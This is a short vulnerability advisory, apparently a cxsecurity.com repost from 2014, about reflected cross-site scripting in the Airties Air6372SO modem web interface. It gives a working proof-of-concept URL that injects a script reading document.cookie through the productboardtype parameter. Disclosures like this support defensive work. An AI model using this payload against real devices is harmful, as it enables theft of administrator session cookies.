Airties Air6372SO Modem Web Interface Cross Site Scripting

2014.09.12
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com [~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE&#169;,VolqaN,Septemb0x, Unuttuklarmz affola.. ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Hardware/Web App : Airties |~Affected Version : Air6372SO |~Official Web: http://www.airties.com |~RISK : Light |~Tested On : Kali Linux \ Windows XP \ Windows Vista \ Airties Air6372SO Modem Web Interface ####################INFO################################ interface can be easily operated without root login. Exploitation; ============================================================================== http://$MODEMROOT/top.html?productboardtype= ? http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script> ============================================================================== .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top